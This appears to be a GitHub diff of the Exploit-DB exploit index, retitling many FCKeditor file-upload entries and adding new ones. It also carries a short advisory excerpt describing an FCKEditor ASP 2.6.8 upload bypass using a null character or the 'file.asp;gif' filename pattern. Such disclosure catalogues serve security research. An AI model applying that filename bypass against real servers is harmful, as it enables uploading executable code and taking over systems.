11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,"ALTBTA ",php,webapps,0
11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0
11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0
@ -11192,9 +11192,9 @@ id,file,description,date,author,platform,type,port
12248,platforms/windows/remote/12248.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetConnectionEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0
12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0
12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0
12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager - test.html) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
@ -11304,7 +11304,7 @@ id,file,description,date,author,platform,type,port
12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0
12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0
12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0
12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0
12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0
12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0
12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0
@ -11458,7 +11458,7 @@ id,file,description,date,author,platform,type,port
12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0
12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0
12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0
12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
12556,platforms/php/webapps/12556.txt,"Tadbir CMS - (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0
12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0
12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0
12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection Vulnerability",2010-05-10,cyberlog,php,webapps,0
@ -11485,7 +11485,7 @@ id,file,description,date,author,platform,type,port
12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0
12587,platforms/linux/remote/12587.c,"WFTPD Server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21
@ -11584,7 +11584,7 @@ id,file,description,date,author,platform,type,port
12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0
@ -11592,7 +11592,7 @@ id,file,description,date,author,platform,type,port
12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0
12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0
12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0
12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
12697,platforms/php/webapps/12697.php,"hustoj - (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0
12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 - _PORT_ command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0
12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0
12700,platforms/asp/webapps/12700.txt,"DotNetNuke Remote File upload Vulnerability",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0
@ -12191,7 +12191,7 @@ id,file,description,date,author,platform,type,port
13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion Vulnerability",2010-06-11,"cr4wl3r ",php,webapps,0
13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) Local File Inclusion Vulnerability",2010-06-11,"Pouya Daneshmand",php,webapps,0
13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP bypass",2010-06-11,Lincoln,windows,remote,0
13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - (FCKeditor) Remote Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0
13836,platforms/windows/dos/13836.py,"Solarwinds 10.4.0.13 - Denial of Service Exploit",2010-06-12,Nullthreat,windows,dos,0
13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local DoS (PoC) (0day)",2010-06-12,R3d-D3V!L,windows,dos,0
13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
@ -12240,11 +12240,11 @@ id,file,description,date,author,platform,type,port
13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 beta Remote File Inclusion Exploit",2010-06-16,sh00t0ut,php,webapps,0
13891,platforms/asp/webapps/13891.html,"AspTR EXtended CSRF Bug",2010-06-16,FreWaL,asp,webapps,0
13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem Upload Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
13893,platforms/php/webapps/13893.txt,"Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - (fckeditor) Remote Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0
13894,platforms/php/webapps/13894.txt,"2daybiz online classified system SQLi AND XSS Vulnerability",2010-06-16,Sid3^effects,php,webapps,0
13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
13897,platforms/php/webapps/13897.txt,"Real Estate SQL Injection Vulnerability",2010-06-16,"L0rd CrusAd3r",php,webapps,0
13898,platforms/php/webapps/13898.pl,"DMSEasy0.9.7 (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
13898,platforms/php/webapps/13898.pl,"DMSEasy 0.9.7 - (fckeditor) Arbitrary File Upload",2010-06-17,sh00t0ut,php,webapps,0
13899,platforms/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Include Vulnerability",2010-06-17,sh00t0ut,php,webapps,0
13900,platforms/php/webapps/13900.txt,"Easy Travel Portal SQl Vulnerable",2010-06-17,"L0rd CrusAd3r",php,webapps,0
13901,platforms/php/webapps/13901.txt,"PenPals Authentication Bypass",2010-06-17,"L0rd CrusAd3r",php,webapps,0
@ -12472,7 +12472,7 @@ id,file,description,date,author,platform,type,port
14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14182,platforms/windows/remote/14182.py,"HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
@ -13254,7 +13254,7 @@ id,file,description,date,author,platform,type,port
15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0
15600,platforms/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15601,platforms/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution Exploit",2010-11-23,Rew,windows,remote,0
15602,platforms/php/webapps/15602.txt,"PHPMotion FCKeditor File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15602,platforms/php/webapps/15602.txt,"PHPMotion 1.62 - (FCKeditor) File Upload Vulnerability",2010-11-23,trycyber,php,webapps,0
15605,platforms/php/webapps/15605.txt,"GetSimple CMS 2.01 - 2.02 - Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - (.m3u) Buffer Overflow Vulnerability",2010-10-10,"Anastasios Monachos",windows,dos,0
15230,platforms/asp/webapps/15230.txt,"Site2Nite Auto e-Manager SQL Injection Vulnerability",2010-10-10,KnocKout,asp,webapps,0
@ -13300,7 +13300,7 @@ id,file,description,date,author,platform,type,port
15279,platforms/windows/local/15279.rb,"FatPlayer 0.6b - (.wav) Buffer Overflow Vulnerability (SEH)",2010-10-18,"James Fitts",windows,local,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc Multiple SQL Injection Vulnerabilities",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-10-18,"Kubanezi AHG",php,webapps,0
15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@ -13364,7 +13364,7 @@ id,file,description,date,author,platform,type,port
15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System <= 7.5 game.php SQL Injection Exploit",2010-10-29,"Easy Laster",php,webapps,0
15352,platforms/windows/remote/15352.html,"Firefox 3.6.8 - 3.6.11 Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
15353,platforms/php/webapps/15353.txt,"Joomla Component com_jfuploader < 2.12 - Remote File Upload",2010-10-30,Setr0nix,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 & 0.2 - (fckeditor) Shell Upload Vulnerability",2010-10-30,Net.Edit0r,php,webapps,0
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) Newsletter <= 4.2 - XSS/Information Leakage",2010-10-30,p0deje,php,webapps,0
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service Vulnerability",2010-10-30,"MOHAMED ABDI",windows,dos,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Remote Directory Traversal Exploit",2010-10-30,"Yakir Wizman",windows,remote,0
@ -13388,7 +13388,7 @@ id,file,description,date,author,platform,type,port
15385,platforms/php/webapps/15385.txt,"Kandidat CMS 1.4.2 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15386,platforms/php/webapps/15386.txt,"MemHT Portal 4.0.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15387,platforms/php/webapps/15387.txt,"Webmedia Explorer 6.13.1 Stored Cross-Site Scripting Vulnerability",2010-11-02,"High-Tech Bridge SA",php,webapps,0
15389,platforms/php/webapps/15389.php,"MetInfo 3.0 (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
15389,platforms/php/webapps/15389.php,"MetInfo 3.0 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-02,[sh3n],php,webapps,0
15391,platforms/php/webapps/15391.txt,"Azaronline Design SQL Injection Vulnerability",2010-11-02,XroGuE,php,webapps,0
15394,platforms/windows/dos/15394.txt,"Maxthon 3.0.18.1000 CSS Denial of Service Vulnerability",2010-11-02,4n0nym0us,windows,dos,0
15395,platforms/asp/webapps/15395.txt,"Site2Ntite Vacation Rental (VRBO) Listings SQL Injection Vulnerability",2010-11-02,"L0rd CrusAd3r",asp,webapps,0
@ -13444,7 +13444,7 @@ id,file,description,date,author,platform,type,port
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
15453,platforms/php/webapps/15453.txt,"Joomla Component (com_ckforms) Local File Inclusion Vulnerability",2010-11-08,"ALTBTA ",php,webapps,0
15454,platforms/php/webapps/15454.txt,"Joomla Component (com_clan) SQL Injection Vulnerability",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 & 4 - (fckeditor) Arbitrary File Upload Vulnerability",2010-11-08,Net.Edit0r,php,webapps,0
15456,platforms/php/webapps/15456.txt,"Joomla Component (com_clanlist) SQL Injection Vulnerability",2010-11-08,CoBRa_21,php,webapps,0
15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service Vulnerability",2010-11-12,anT!-Tr0J4n,windows,dos,0
@ -13461,7 +13461,7 @@ id,file,description,date,author,platform,type,port
15468,platforms/php/webapps/15468.txt,"Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla Component (com_markt) SQL Injection Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15470,platforms/php/webapps/15470.txt,"Joomla Component (com_img) LFI Vulnerability",2010-11-09,CoBRa_21,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKeditor 2.x <= 2.4.3 - Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x <= 2.4.3 - (FileManager - upload.php) Arbitrary File Upload Vulnerability",2010-11-10,grabz,php,webapps,0
15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - CSRF",2010-11-09,daandeveloper33,php,webapps,0
15473,platforms/multiple/webapps/15473.html,"IBM OmniFind CSRF Vulnerability",2010-11-09,"Fatih Kilic",multiple,webapps,0
15474,platforms/multiple/dos/15474.txt,"IBM OmniFind Buffer Overflow Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0
@ -13829,7 +13829,7 @@ id,file,description,date,author,platform,type,port
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
15962,platforms/solaris/local/15962.c,"Linux Kernel - Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
@ -15028,7 +15028,7 @@ id,file,description,date,author,platform,type,port
17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass",2011-05-12,h1ch4m,windows,local,0
17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0
17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0
17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin 2.5 - (FCKeditor) Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0
17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0
17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0
@ -15324,7 +15324,7 @@ id,file,description,date,author,platform,type,port
17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0
17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0
17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0
17644,platforms/php/webapps/17644.txt,"FCKeditor - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager - test.html) Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0
17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0
17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0
@ -20250,7 +20250,7 @@ id,file,description,date,author,platform,type,port
23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.PHP Cross-Site Scripting Vulnerability",2003-08-09,"Boy Bear",php,webapps,0
23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication Vulnerability",2003-08-09,"Buckaroo Banzai",windows,remote,0
23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0
23005,platforms/asp/webapps/23005.txt,"FCKEditor ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0
23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0
23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure Vulnerability",2003-08-11,"Zone-h Security Team",php,webapps,0
23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability",2003-08-11,root@networkpenetration.com,windows,remote,0
@ -32832,7 +32832,7 @@ id,file,description,date,author,platform,type,port
36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 - 'fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
36413,platforms/php/webapps/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0
36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
@ -33811,7 +33811,7 @@ id,file,description,date,author,platform,type,port
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
37499,platforms/php/webapps/37499.txt,"Phonalisa Multiple HTML-Injection Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
37457,platforms/php/webapps/37457.html,"FCKEditor 'spellchecker.php' Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
37457,platforms/php/webapps/37457.html,"FCKEditor Core - (Editor - 'spellchecker.php') Cross Site Scripting Vulnerability",2012-06-25,"Emilio Pinna",php,webapps,0
37458,platforms/windows/dos/37458.pl,"Winamp 5.13 '.m3u' File Exception Handling Remote Denial of Service Vulnerability",2012-06-25,Dark-Puzzle,windows,dos,0
37459,platforms/php/webapps/37459.txt,"Umapresence Local File Include and Arbitrary File Deletion Vulnerabilities",2012-06-25,"Sammy FORGIT",php,webapps,0
37460,platforms/php/webapps/37460.txt,"Schoolhos CMS HTML Injection Vulnerabilities",2012-06-27,the_cyber_nuxbie,php,webapps,0
@ -34037,3 +34037,7 @@ id,file,description,date,author,platform,type,port
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0

Can't render this file because it is too large.

14
platforms/asp/webapps/23005.txt
View file

@ -5,11 +5,21 @@
There is no validation on the extensions when FCKEditor 2.6.8 ASP version is
dealing with the duplicate files. As a result, it is possible to bypass
the protection and upload a file with any extension.
- Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/
- Solution: Please check the provided reference or the vendor website.
- PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
"
Duplicate files do not have proper validation on their extensions.
As a result, it is possible to upload any file with any extension on the server by using Null Character.
Applications on IIS6 can also use "file.asp;gif" pattern.
